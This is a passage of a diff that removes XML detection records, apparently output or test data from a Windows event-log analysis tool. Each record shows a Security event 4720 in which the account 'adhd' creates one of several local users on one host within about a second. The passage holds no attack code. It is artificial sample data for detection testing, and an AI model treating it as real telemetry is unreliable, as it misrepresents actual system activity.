-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Amber</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4153</recordid>
-            <time>2020-06-11 22:04:52.686020600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.6860206Z'/&gt;&lt;EventRecordID&gt;4153&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Nancy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1018&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Nancy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Nancy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4147</recordid>
-            <time>2020-06-11 22:04:52.611615100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.6116151Z'/&gt;&lt;EventRecordID&gt;4147&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Samantha&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1017&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Samantha&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Samantha</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4141</recordid>
-            <time>2020-06-11 22:04:52.521030500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.5210305Z'/&gt;&lt;EventRecordID&gt;4141&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Kimberly&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1016&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Kimberly&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Kimberly</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4135</recordid>
-            <time>2020-06-11 22:04:52.439829100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.4398291Z'/&gt;&lt;EventRecordID&gt;4135&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Amy&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1015&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Amy&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Amy</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4129</recordid>
-            <time>2020-06-11 22:04:52.334204600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.3342046Z'/&gt;&lt;EventRecordID&gt;4129&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Victoria&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1014&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Victoria&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Victoria</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4123</recordid>
-            <time>2020-06-11 22:04:52.231553300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.2315533Z'/&gt;&lt;EventRecordID&gt;4123&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Barbara&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1013&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Barbara&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Barbara</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4117</recordid>
-            <time>2020-06-11 22:04:52.159400000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.1594000Z'/&gt;&lt;EventRecordID&gt;4117&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;George&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1012&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;George&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>George</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4111</recordid>
-            <time>2020-06-11 22:04:52.58821800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:52.0588218Z'/&gt;&lt;EventRecordID&gt;4111&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Amanda&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1011&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Amanda&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Amanda</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4105</recordid>
-            <time>2020-06-11 22:04:51.980650700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:51.9806507Z'/&gt;&lt;EventRecordID&gt;4105&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jane&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1010&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jane&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

